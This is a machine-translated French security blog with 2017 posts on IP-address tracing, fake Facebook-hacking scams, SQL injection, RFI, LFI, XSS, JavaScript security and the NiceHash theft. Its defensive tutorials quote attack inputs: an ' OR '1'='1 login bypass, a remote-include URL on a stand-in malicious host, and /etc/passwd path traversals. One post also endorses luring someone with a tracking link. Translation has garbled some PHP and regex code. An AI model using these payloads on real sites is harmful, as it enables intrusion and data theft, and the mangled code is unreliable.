Tuesday, 26 December 2017

And security is optional?

Just to see in the computer books section of the fnac, we distinguish clearly at the forefront all kinds of books on programming languages ​​and other "how to use Windows." Then, all the way down to the end of the hiding place and near the door, there are books on computer security.
As if, and indeed it is often the case, only a few people considered elitist for some or nerds for others, are interested.
The problem is that security concerns everyone ...
it security

Security at home

Security in individuals is quite simple: it is essentially learned by the media. Some surveys or reports open the eyes of many people. A sensitization unfortunately still too weak that should be strengthened. Internet resources are also very effective at learning computer security, and I hope this blog contributes a lot.
Here is the typical situation:
As a non-sensitized individual, we are afraid of computer viruses. We do not know what it is, we do not know how they get there, but we know that they can enter the computer quite easily. We are also afraid for our data online, we say that hackers are everywhere and can do everything, know everything about us.
Awareness and learning of computer security will recalibrate these thoughts and be much more serene online.

Computer security at the University

Another important point to raise is learning and awareness of computer security in computer schools.
At the time of writing this article, I am about to complete my computer science degree and we have not had a single little security awareness .
Nothing to be expected for the few Masters offered. In fact, only a master or two specialized in computer security are available here and there in France.
Again this is a form of option.
You are interested in safety or you do not care, as you want, you put your belt in the car or not, as you want.
Yes it's a pity, and not only a pity for those who are interested in a minimum, but especially for the average user who will only pay attention to the day or the damage will be done. And it will happen. And it will be too late.
Update a few years later : it seems that more and more companies and schools are finally focusing their services on computer security, and it was time . This awareness of computer security is still too weak, throughout my university career until the end of my studies, I had a quick course on the security of systems and networks.

Sunday, 24 December 2017

How to recover an IP address

This question is often asked, and few people understand how easy it is to retrieve an IP address from a remote computer.
From the legal point of view, the opinions diverge, we have on one side:
"The IP address may be collected without prior authorization from the CNIL because it is an indirect personal data" - Cass / Crim - January 13, 2009 - Cassation
The latter does not make it possible to determine with certainty the natural person who holds it because:
  • Many people can use the same computer
  • IP addresses can be dynamic and therefore change regularly
  • Only ISPs can theoretically determine the real physical person behind an IP address at any time
That said, it is possible to want to recover "legitimately" the IP address of a potential hacker, especially when it concerns our personal security.
I quote :
"Any processing of customer data, such as IP addresses, must comply with the national provisions implementing the requirements of Directive 95/46 / EC; thus, personal data must be processed for legitimate reasons and for a specific purpose, and the processing must be proportionate to the objective pursued. "

Update: After long months of legal differences, I quote the last answer I got: "the CNIL considers that the IP address is a personal data since it allows to identify directly or indirectly a physical person ".
The Hacker Blog does not offer IP address recovery services or any processing on them. And the services presented in this article are therefore for informational purposes only.

How to recover an IP address using the usual services

To recover an IP address, there are different techniques more or less functional. We all send e-mails, sometimes even daily, but did you know that the IP address of the sender is transmitted with the message ?
recover ip address

When you receive an email, you can usually (but not always) click on "  View original  " or "  View message source  " depending on your email client to view the IP address of the sender of this message .
The same thing happens when you "chat" online with someone because the program needs to know both IP addresses in order to allow remote dialogue. This is the case of software like Skype , which allows each interlocutor to learn about the IP address of the other, via specialized software like TcpView .
Finally, the same thing happens when you post a message on a forum, most of the time your IP is registered with your message. So there are potentially a lot of ways to get a given IP address, and your own IP address is "processed / stored" by many of the sites you visit every day.

How to find an IP address?

There are specialized services to find IP addresses, like the site WhatsTheirIP.com that allow you to retrieve a given IP address. The operation of this site is simple:
  1. You provide an e-mail address (do not hesitate to use a disposable e-mail address, just in case)
  2. You get a fake link.
  3. Each click on this fake link will generate an email to the address provided.
With this step, all you have to do is convince your hacker to click on the link, especially by falsely offering him what he is looking for.
Once again, The Hacker Blog takes no responsibility for the use of these types of services that are binding only their owners, and you.

Important note:
I repeat, the IP address is still not a safe bet on the identity of the person is therefore not 100% reliable. In addition, the location of an IP is even less reliable , it is based on estimates . You will not (unfortunately) get the exact location of a person, but the geolocation obtained can help you as evidence or additional track, including to make your case to file a complaint. To geolocate an IP address, go to a site like iplocation.net (there are many alternatives).

Friday, 22 December 2017

Hacking a Facebook account in two seconds? really ?

«You want to hack a Facebook account in 2 seconds, enter the name of your target»

hack facebook


A logo made under Paint in 2 seconds, too.
Well, if you clicked or if you believed, it does not matter . Sorry to have used this approach but it is the best and only way of prevention that I have, and the one that will save you from losing money.
Just be aware that all these hacking websites are fake .
You will not hack anyone, you will pay and get caught Your money will go to a cave in Seychellesand you will not even be able to sue your scammer.
No service will be able to provide you with a one-click password, whether paying for it or not, whether using a secret flaw or not, whether it is recommended or "rated" by users or not.


hack facebook


Why can not you hack Facebook account with these services?

Simply because Facebook is secure ! It is still one of the most popular sites in the world and there are ways behind all that!
Imagine that a flaw is really present that would fly any account in one click . Not only the fault would be corrected in the minute, but in addition the news would circumnavigate the world in the minute too. And its author would not waste time making it a paid site or free. He would certainly have much better things to do with this flaw.
I do not say it does not happen, but I do not think a site would be created soon and especially would be functional for so long.
It is probably possible to hack, since accounts are regularly, but using other schemes aimed at users with little awareness, just as we are targeting YOU with these false services.
Other resource :
In computer security, we learn the approach of the attackers (the real ones) who are targeted, precise and long. This is the reverse of the "one-click" hacking YOU may be victim of.

Monday, 18 December 2017

Protect yourself from SQL injection

Introduction: What is SQL injection
sql injection

Article for web developers and site administrators.
An SQL injection is as its name suggests an injection or insertion of SQL code via data transmitted from a website. A successful and properly exploited injection can recover sensitive information from a database or modify / delete / add data. In general, all actions related to a database are possible. Usually this type of injection concerns PHP with a SQL database but other languages ​​like ASP can also be involved.
This type of injection usually occurs when user data is used without being filtered or verified.

What exactly can be done with SQL injection?

Usually the hacker will seek to retrieve sensitive information from your database.
Even if you know your visitors or do not think you know a user capable of attacking your site, you should know that a hacker will simply search for vulnerable sites using what is called a Dork Google . A Dork is a very precise keyword containing a model which makes it possible to recover potentially fallible sites.
There are no legitimate reasons to display all possible dorks here and besides they are very numerous, just know that you can search for a specific page that could correspond to a fallible page of your site.
By connecting to such a page, the SQL query that we place on our site usually looks like:
"SELECT id FROM users WHERE name = 'Admin' AND password = '". $ _ POST ["password"]. "'"

We therefore select the identifier of the user whose name is Admin and whose password corresponding to the one sent by the user who wants to connect.
This is NEVER to do, because if you post:
'OR' 1 '=' 1
as a password we get the following query:
"SELECT id FROM users WHERE name = 'Admin' AND password = '' OR '1' = '1'"
What gives, translated into French: "Select the identifier of the user whose name is admin and whose password is empty OR 1 is equal to 1"
Thus the password will not be empty but 1 is equal to 1 so access is allowed , the identifier is selected .
This is the very classic example that is often talked about during databases.

How do I know if my site is fallible?

We can search for problems from our source code directly but also, and more simply, by adding a
'
at the end of a fallible url. If an error appears on your site type, it is that there is potentially a problem:
Erreur dans l'exécution de la requête 'SELECT * FROM galerie WHERE id = 2''. Message de MySQL : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
The error appears on the site because " id=2' "is directly used to form the query while " ' "is a special character of SQL. This causes a syntax error.
This error therefore tells us that the data entered by the users are not checked on the server side, and that there is a good chance that we can go further.
I'm not going to continue until the end but know that then the hacker can recover the table names and display their contents. The password (the admin table for example) appear generally encrypted on the site. This is why it is essential to encrypt user passwords in databases.
The other way to know if his site is fallible is to scan his source code.
There are two ways to scan a source code: the manual way and the automatic way .
The manual way is, as the name suggests, to look for our pieces of code that communicate with the database and ensure that they are robust (see below in the article).
The automatic way is to analyze its code with a tool. OWASP offers a list of tools like this:

Blind SQL injection

As its name suggests, the "blind" SQL injection consists in exploiting a fallible site in the same way as the one we saw, except that the result (the error messages) are not not displayed on the page.
Again, complete tools are used to automate all of this. Especially if a company uses a team of ethical hackers to test the security of their systems without having to provide the source code.

How to protect yourself

Let's come to the essential point, guard against SQL injection attacks.
If we take the example of the beginning:
"SELECT id FROM users WHERE name = 'Admin' AND password = '". $ _ POST ["password"]. "'"
We use here what the user sends directly in the request.
So the first thing to do is to avoid (escape) special characters using mysqli_real_escape_string () :
"SELECT id FROM users WHERE name = 'Admin' AND password = '" .mysqli_real_escape_string ($ _ POST ["password"]). "'"
The addslashes () and magic_quotes_gpc () functions are also used but do not protect as well as mysqli_real_escape_string () .
A way that tends to generalize but has a slight impact on performance is the use of prepared commands
The stored procedures require more knowledge but can also be used. The identification will remain well protected within the procedure and can no longer be diverted.
Finally, it is preferable to use limited access user accounts to prevent the modification or deletion of database elements. And possibly check the data with regular expressions or use tables containing all the possible results.

Friday, 15 December 2017

Protect yourself from the RFI (Remote File Inclusion) vulnerability

Introduction: What is the RFI Fault

Article for web developers and site administrators.
The RFI fault is similar to the LFI fault . It also allows you to include files belonging to an external server from a URL. But it mostly allows to include any file on the remote server.
Be reassured, this flaw is becoming increasingly rare following updates to web servers and systems.

RFI


What can be done with an RFI fault?

This flaw often makes it possible to place a php shell on the server in order to administer it remotely.
Orders can therefore be executed and in general anyone can control your fallible website via these. 
It is of course possible to include any other file on such a server. And so it is possible to perform many different actions and varied by exploiting this flaw.

How do I know if my site is fallible?

Your site may be fallible if it uses a URL like this typical example:
http://exemple.com/index.php?page=news
It is therefore possible to include a file from another site:
http://exemple.com/index.php?page=http://sitemalveillant.com/script.txt
A typical fallible php script looks like this:
<?php
include($_GET['page']); //à ne jamais faire
?>

How to protect yourself

To start, make sure you have everything updated, your web server, your system etc.
Then the protection is similar to that used for the LFI flaws, just include the files without going directly through a URL:
<? Php
 $ lespages = array ('news' => 'news.htm', 'contact' => 'contact.htm', 'home' => 'home.htm');
if (in_array ($ _ GET ['page'], array_keys ($ pages))) {// if the page is in the array
      include $ pages [$ _ GET ['page']]; // we include it without risk
 } else {// else return to home
      include $ pages ['home'];
}?>

Tuesday, 12 December 2017

Protect yourself from the LFI (Local File Inclusion) vulnerability

Introduction: What is the LFI Fault

Article for web developers and site administrators.
The LFI flaw is named Local File Inclusion . It allows a user to include local files (thus belonging to the external server) from a URL.
These files may very well be outside the root directory of the website. Sensitive files such as those containing personal data and especially passwords can be included and retrieved.
We often need to include a file in a page in a completely legitimate way as in the following example:
 http://exemple.com/vulnerable.php?page=menu.php
Only the fact of checking if this file exists is not enough , it is necessary to make sure that it is the one that one wants.
Note that this flaw also allows you to execute PHP code on the remote server.
LFI


What can be done with an LFI fault?

Usually this flaw can help retrieve information like the names of your server users and their password:
http://www.exemple.com/pagevulnerable.php?page=../../../../../../../../../../../etc / passwd
LFI

Example of a passwd file that can be displayed directly on a fallible site.
You can also retrieve the source code of a php page or execute PHP commands remotely by posting them to a specific url.
In the worst case, a php shell can be installed on your server to allow a user to execute remote commands .

How do I know if my site is fallible?

If your site uses a URL as we have seen above, it is possible that it is fallible.
Here is a typical example of a fallible php script :
<? Php
   $ file = $ _GET ['file'];
   if (isset ($ file))
   {
       include ( "pages / $ file"); // include the file if it exists
   }
   else
   {
       include ( "index.php"); 
   }
   ?>
For example, see if a user can access the files on your site:
http://www.exemple.com/vulnerable.php?page=../../../../../../../../fichier

How to protect yourself

So we will change our previous script to eliminate the possibility of using "../" and force the extension ".php":
<? Php
   $ file = str_replace ('../', '', $ _GET ['file']); // eliminate ../
   if (isset ($ file))
   {// the file will have to be included by its name without .php
       include ("$ file". ".php"); // add here the .php
   }
   else
   {
       include ( "index.php");
   }
   ?>
Be aware however that it is possible to use hexadecimal encoding instead of slashes because the browser converts them correctly:
http://www.exemple.com/vulnerable.php?page=..%2F..%2F..%2F..%2F..%2Ffichier
And it is also possible to use the NULL Byte to stop the string before the extension and thus bypass this restriction.
On new versions of apache this kind of exploitation is no longer possible because% 2F and% 00 are not managed by security . That said you can still add this line to avoid any flaw:
$ file = str_replace (chr (0), '', $ file); // chr (0) being the null byte
Another simple and radical technique is to include the name directly in the code without going through the URL but testing a name instead:
<? php if ($ _GET ['page'] == "news") {
    include ( "news.php");
} else {
    include ("home.php");
}?>

Monday, 11 December 2017

Protect yourself from the XSS (Cross-site scripting) vulnerability

Introduction: What is the XSS Fault

Article for web developers and site administrators.
XSS comes from Cross-Site Scripting and as the CSS acronym was already taken for Cascading Style Sheets , we used an X for "cross".
The flaw is to inject an arbitrary script into a page to cause a well-defined action . Other users run the script without realizing it as soon as the page is opened.
Cross also means crossing, because one of the goals of the flaw is to run a script to transmit data from one site to another.
This problem is mainly at the level of cookies, because one can for example recover the cookies of a site A from a site B. One can thus recover the cookies of anyone, even the administrator of a site .
Note also that we can exploit the XSS fault in JavaScript but also with other languages.
xss vulnerability


What can be done with an XSS Fault?

There are two types of XSS faults:
1) Permanent XSS
This is when the script is stored on the external server (database). It is therefore retrieved and executed at any time on the site by any user.
2) Non permanent XSS
The script is often embedded in a URL and is executed without being stored on a server.
We can distinguish several non-exhaustive possibilities of exploiting this fault:
  • A redirection of the page to harm the users or to attempt a phishing attack.
  • Stealing sessions or cookies. (So ​​pretending to be another user to perform actions)
  • Make the site inaccessible by using loop alerts or any other harmful means.

How do I know if my site is fallible?

When you pass data (comments, article posts, search for a term, etc.) via your site, if a script passed as:
<script type = "text / javascript"> alert ('test'); </ script>
runs, that is, if the "test" dialog box appears, your site is fallible .

Example of exploiting XSS flaw

The first XSS worm named Samy spread on myspace in 2005. All users who visited a specific page re-propagated the worm in turn.
I can not name all the possibilities, but know that it happened to me to see flaws XSS in the nicks of the members. The administrator relied only on JavaScript that checked if the nick contained only letters and numbers, but did not check on the server side.

How to protect yourself

It is absolutely necessary to use the php functions htmlspecialchars()which filters the '<' and '>' or htmlentities()which filters all the entities html.
These functions should be used on user entries that will appear later on your site. If they are not filtered, scripts like the ones we saw above will run with all the trouble that ensues.
Here is an example of using this function:
<?php echo htmlspecialchars($_POST['nom']); // echo affiche les données sur un page, du coup on protège l'affichage avec la fonction htmlspecialchars?>
As possible, we must place cookies with the HttpOnly parameter , preventing their recovery with JavaScript (Attention it is not necessarily supported by all browsers).

Thursday, 7 December 2017

Bitcoin cryptocurrency marketplace NiceHash loses millions for hackers

bitcoin nicehash hacked

While many Bitcoin investors are waddling in record valuations, some are facing an astonishing loss.
Crypto-currency marketplace NiceHash said Wednesday that hackers stole the contents of its virtual wallet, amounting to over $ 60. million. The breach was announced the same day Bitcoin rose 18.2% to go through the $ 13,000 and then $ 14,000 per room for the first time.
NiceHash, a market for cryptocurrency exploitation in the cloud, made its announcement after a breakdown of several hours attributed to "maintenance" and reported to NiceHash users that their portfolios had been emptied. NiceHash suspended its operations for 24 hours to determine how many bitcoins were stolen and how. But a report by Coindesk suggests that the portfolio contained 4,736 bitcoins, worth about $ 66 million at current prices.
"This is a matter of deep concern and we are working hard to fix it in the coming days." said in a statement. "In addition to conducting our own investigation, the incident has been reported to the relevant authorities and law enforcement and we are cooperating with them urgently."
In the meantime, NiceHash recommends users to change their passwords
Bitcoin has proven popular with currency traders, running massive in 2017. On January 1 of this year, the price of bitcoin was just under $ 1,000. On Wednesday, the currency rose from $ 2,170 to $ 14,095 before settling at $ 13,696 so far and giving it a market capitalization of $ 231 billion.
This is not the first time that a bitcoin wallet is the victim of a lack of security. One of the most famous security breaches resulted in the exchange of bitcoin Mt. Gox went bankrupt in 2014 after losing nearly 850,000 customers and exchanged bitcoins.

Wednesday, 6 December 2017

JavaScript security

JavaScript is an object-oriented programming language (prototype) mainly used on the web. Note that it has nothing to do with Java. It is interpreted by your browser and, in short, it is he who displays messages like "Please fill in all fields" when you want to make a purchase without putting the number of your credit card. It is very convenient for making websites interactive.
With JavaScript we are at the client computer. We will detail the terms "client" and "server" thereafter.
JavaScript is already a secure minimum, for example you can not access the Windows registry or create default folders and files. Although it is feasible with VBScript under Internet Explorer only.
You can not access variables from other sites or view other pages opened by the browser. You can, however, set cookies.

1) Why do not trust Javascript if you own a website

This example comes from another website (which thought well done) and was copied identically. Try to find the password.
The most experienced of you will have found, just display the source code of the page (CTRL + U) to display this beautiful piece of JavaScript code:
 function Login () {
            var password = document.login.password.value;
            if (password == "kztYq8") {
                window.location = "bravo.htm";
            }
            else
            {
                window.location = "dommage.htm";
            }
        }
Erf.
javascript security

Not only is the password set in clear , it is the same for everyone BUT in addition the resulting file is given . I do not even need the password.
All that to say that the JavaScript code that you write is visible to everyone . Visible and editable!
But besides, and we come to the second point, it is deactivable .

2) Check on the client side AND on the server side

The client side is the side of all your visitors, it is their browser that will display your page. The server side is the code that will run only on your server and is therefore inaccessible to clients.
What you check on the client side (with JavaScript) is unreliable as we have seen and needs to be re-checked on the server side (in php / asp / etc).
But what's the use of JavaScript? We saw it at the beginning, it serves to make the site more ergonomic, more interactive.
Let's take an example:
function validateURL (val) {
   var test = / (ftp | http | https): // (w +: {0,1} w * @)? (S +) (: [0-9] +)? (/ | / ([w # !: .? = + &% @ - /])) / test (document.frmrac.url.value!);?.
   if (test == false) {
           alert ("The URL to shorten is invalid!");
           return false
    }
    else return true;
}
The line with (w +: {0,1} ... etc is a regular expression that will test whether a string is a URL, if the return value is false it is not a URL and you do not can (normally) not submit the form.
Let's say I'm smart and disable JavaScript , I can write anything and submit the form without seeing the message "The URL to be shortened is not valid! ".
Only I check again on the server side (php so) if the link is a URL :
function validateURL ($ url) {
    if (filter_var ($ url, FILTER_VALIDATE_URL) == FALSE) return FALSE;
    else return TRUE;
}
and if it is not the case you have this time the right to a message "The specified link is not valid".

3) Go further

We have seen that we should not place private elements in JavaScript code and that we should not rely on it when validating data.
This is especially true since it is possible in specific cases to submit a valid but distorted data. And that it is possible to change the data on the fly.
I can for example copy the source code of a page, change the JavaScript code, re-register and submit everything.
I also see the famous "right click off" on some pages that use JavaScript code to prevent copying the elements of the site.
It is NOTHING. We saw that it is enough to disable JavaScript to bypass this "restriction".